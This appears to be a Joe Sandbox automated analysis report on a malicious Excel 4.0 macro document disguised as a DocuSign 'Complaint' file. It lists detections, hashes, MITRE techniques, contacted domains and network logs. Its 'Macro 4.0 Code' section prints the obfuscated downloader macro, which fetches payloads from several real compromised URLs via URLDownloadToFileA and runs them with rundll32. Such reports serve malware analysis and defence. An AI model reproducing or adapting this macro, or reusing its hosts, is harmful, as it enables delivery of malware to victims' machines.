Analysis Report Complaint-447781983-02182021.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
| |
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Uses secure TLS version for HTTPS connections |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Automated click: | ||
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Binary or memory string: | ||
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol13 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
31% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
8% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
rzminc.com | 72.52.227.180 | true | false |
| unknown |
crt.sectigo.com | 91.199.212.52 | true | false |
| unknown |
jugueterialatorre.com.ar | 138.36.237.100 | true | false |
| unknown |
pathinanchilearthmovers.com | 162.241.80.6 | true | true |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.241.80.6 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true | |
138.36.237.100 | unknown | Argentina | 27823 | DattateccomAR | false | |
91.199.212.52 | unknown | United Kingdom | 48447 | SECTIGOGB | false | |
72.52.227.180 | unknown | United States | 32244 | LIQUIDWEBUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356654 |
Start date: | 23.02.2021 |
Start time: | 14:25:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Complaint-447781983-02182021.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 22 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@11/9@4/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.241.80.6 | Get hash | malicious | Browse |
| |
138.36.237.100 | Get hash | malicious | Browse |
| |
91.199.212.52 | Get hash | malicious | Browse |
| |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
crt.sectigo.com | Get hash | malicious | Browse |
| |
rzminc.com | Get hash | malicious | Browse |
| |
jugueterialatorre.com.ar | Get hash | malicious | Browse |
| |
pathinanchilearthmovers.com | Get hash | malicious | Browse |
| |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DattateccomAR | Get hash | malicious | Browse |
| |
SECTIGOGB | Get hash | malicious | Browse |
| |
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1559 |
Entropy (8bit): | 7.399832861783252 |
Encrypted: | false |
SSDEEP: | 48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep |
MD5: | ADAB5C4DF031FB9299F71ADA7E18F613 |
SHA1: | 33E4E80807204C2B6182A3A14B591ACD25B5F0DB |
SHA-256: | 7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676 |
SHA-512: | 983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 3.129725157113391 |
Encrypted: | false |
SSDEEP: | 3:kkFklp7eykltfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKms8jXxp9jKFlIaYM2+/LOjA/ |
MD5: | 67FB835F22BC7093A5ECFD80F7BB68D7 |
SHA1: | 83D1A30B13FE58549A6C20423F73D77E0EC32E39 |
SHA-256: | 79E601F80A121E73B3417E207319969CF2DE8A037EE2B96CB1A2D9F88DA5B8DA |
SHA-512: | 2AEBD221A791B77343273ED6CE37EC00A7C57C9ED08F5D7F96260CF576E8321746E47770183DA227F5B6B8A155C5604B36D68BB97D72F9C079B4D0FD02FE1DC3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 132891 |
Entropy (8bit): | 5.375867383663069 |
Encrypted: | false |
SSDEEP: | 1536:bcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:TcQ9DQW+z0XiK |
MD5: | 17626CC8CC2FA19C8480F81AA2D86C85 |
SHA1: | D5D9C531001CA671D180743B31396D1905D9E88E |
SHA-256: | 234CA312A08DA031D6F85D916DE02DC4104B84050C0BBFE1EA11FDA806E796B8 |
SHA-512: | 2A0F4B952BBD0DB18843644643D0055F1083CBDCD0580791DD61FA2CC56CC285DDCB13852327A275745DE428F4F9D69F541C6981E362AF72B82FA82A3718C25A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 31494 |
Entropy (8bit): | 7.641881919106936 |
Encrypted: | false |
SSDEEP: | 384:A2Y9JPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyoqjNHs+q:J2hViKiW+u7qS7BHRbu3TukqRtq |
MD5: | D7DBDDF0041076A4623D6AFE6B3D3190 |
SHA1: | 08CA102A9D7587421DD767EF9CA0B2F75E2EEACA |
SHA-256: | 6865B0727ED18B3D59FE2FD3872101BD408175F7AB1B2CD7F3CF8189C2C34A33 |
SHA-512: | CD4ECC97DBF032171AABF362B5D123A7B04B67DCB22BCBAC2E67F832C4194C86032C2893FD0997B1C1F7EF6695D49F3CC768DA8B316975CDEBBB9F5B56C7B3F3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2290 |
Entropy (8bit): | 4.676967723252077 |
Encrypted: | false |
SSDEEP: | 24:8QjGGx/XPSH+GAAUbYT8DY7aB6myQjGGx/XPSH+GAAUbYT8DY7aB6m:8Qjx/XqnXUWQB6pQjx/XqnXUWQB6 |
MD5: | CDE505662EF3E97428636524621C4CC5 |
SHA1: | ADC9BA4474455E6CC78FB077C99B016C97EB2526 |
SHA-256: | C69D03931C69779E169414DD35CF57F7D3C5EA5F740C8ABB0DC8DC2B3334D39E |
SHA-512: | 46059481F45016EBA0FBE61C56F0C093C5FEFFF7B9BA9E7E2546B6309DB20A58FD01106B50B9A25CAA471DBB53CD43BF9E27F1F3EE49703EF503B1AE8A8AE348 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.654008658396181 |
Encrypted: | false |
SSDEEP: | 12:8McXUvJjduCH2POXAyDXOVs5Cm+WrjAZ/DYbDkLSeuSeL44t2Y+xIBjKZm:8Mx/XmV4CkAZbcDA7aB6m |
MD5: | 0909656D991462AF73F5D517D79FBAC5 |
SHA1: | 166ED100EB72AFF58669562F97C2EF69EB19FC86 |
SHA-256: | 3A3E9F1C9D5023143AE8E8B4913EE66F96FB0ADB1FF7410733BDA98DAA4596EE |
SHA-512: | ED32D74B0D48F2E7EB8C64FCE2720EE9F261B31C3C5EB4DD6FBE980C2FDCABBBCE0078855DEB201BA42A6F51407DBADF256C4380021C0BDC3CD1CB4AAD02FE82 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137 |
Entropy (8bit): | 4.791427181491947 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMYlIiSWcz0FXrl+1lIiSWcz0FXrlmMYlIiSWcz0FXrlv:dj6Yl4ubal4ubxYl4ub1 |
MD5: | 733D335954A7C87A9071F01D9ACBE348 |
SHA1: | 1AE168C09F0041C079663BCD4AB9162F33CD7623 |
SHA-256: | 87A461F640E439196E55DB894090873D4B9F7FC9D895E4DCD13B2346165BA1B6 |
SHA-512: | 04CB3D8787A8BA5A86F04E8162756D4A93DB3A2A8BDEB6E6128376E1EBF2978177B3B0A4986D3723DA6159C39765E5C0E76DE63097CD5A9289E37E1EC141A1E9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111230 |
Entropy (8bit): | 6.668853911800476 |
Encrypted: | false |
SSDEEP: | 3072:8s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdK79nGzeNR69mGzeNRlDGzeNR6Gs8rma:F8rmOAIyyzElBIL6lECbgB+P5Nm7TdKn |
MD5: | 56AEACF20EEC43D6FE9469D4D54B1E77 |
SHA1: | BB1F142DA8765D0CF38B8097018C94BE82E94E83 |
SHA-256: | B2055DF49308485C5E6E8527498647782535556F2B107368264BE663D496AC3D |
SHA-512: | 74B62A889B58AED884F6F475DADDB160E449294EE71D9A4F5DDD6B79B645A0E40B3A50285E2D437FEF37F2D428329DE2B04C4AB8D56C156DC0964732D5B091E1 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.697666945848156 |
TrID: |
|
File name: | Complaint-447781983-02182021.xls |
File size: | 145920 |
MD5: | 60f845a847e771a59b97d456c494f69d |
SHA1: | bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6 |
SHA256: | c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319 |
SHA512: | e942975e9b88c1e3783fa7723b8dcaf4cf1acc63e36380a56543ab96393815df27426169d38235790314de18590b0ed1363d38296e3b4a5543dba0f849f103e0 |
SSDEEP: | 3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/V:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Complaint-447781983-02182021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-18 13:42:21 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.321292606979 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.2746714277 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 135085 |
Entropy: | 3.69042254796 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
UDP Packets |
---|
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 23, 2021 14:25:52.664776087 CET | 192.168.2.4 | 8.8.8.8 | 0x838b | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:53.498677969 CET | 192.168.2.4 | 8.8.8.8 | 0x50ec | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:54.586744070 CET | 192.168.2.4 | 8.8.8.8 | 0x46df | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:57.734325886 CET | 192.168.2.4 | 8.8.8.8 | 0x8b5a | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 23, 2021 14:25:52.865950108 CET | 8.8.8.8 | 192.168.2.4 | 0x838b | No error (0) | 72.52.227.180 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:53.696513891 CET | 8.8.8.8 | 192.168.2.4 | 0x50ec | No error (0) | 162.241.80.6 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:54.891293049 CET | 8.8.8.8 | 192.168.2.4 | 0x46df | No error (0) | 138.36.237.100 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:57.783886909 CET | 8.8.8.8 | 192.168.2.4 | 0x8b5a | No error (0) | 91.199.212.52 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:53.024821997 CET | 2534 | OUT | |
Feb 23, 2021 14:25:53.485604048 CET | 2589 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.4 | 49732 | 162.241.80.6 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:53.866291046 CET | 2951 | OUT | |
Feb 23, 2021 14:25:54.569462061 CET | 3145 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.4 | 49734 | 138.36.237.100 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:55.179770947 CET | 3152 | OUT | |
Feb 23, 2021 14:25:56.756165028 CET | 3172 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.4 | 49738 | 91.199.212.52 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:57.848548889 CET | 3185 | OUT | |
Feb 23, 2021 14:25:57.911541939 CET | 3187 | IN |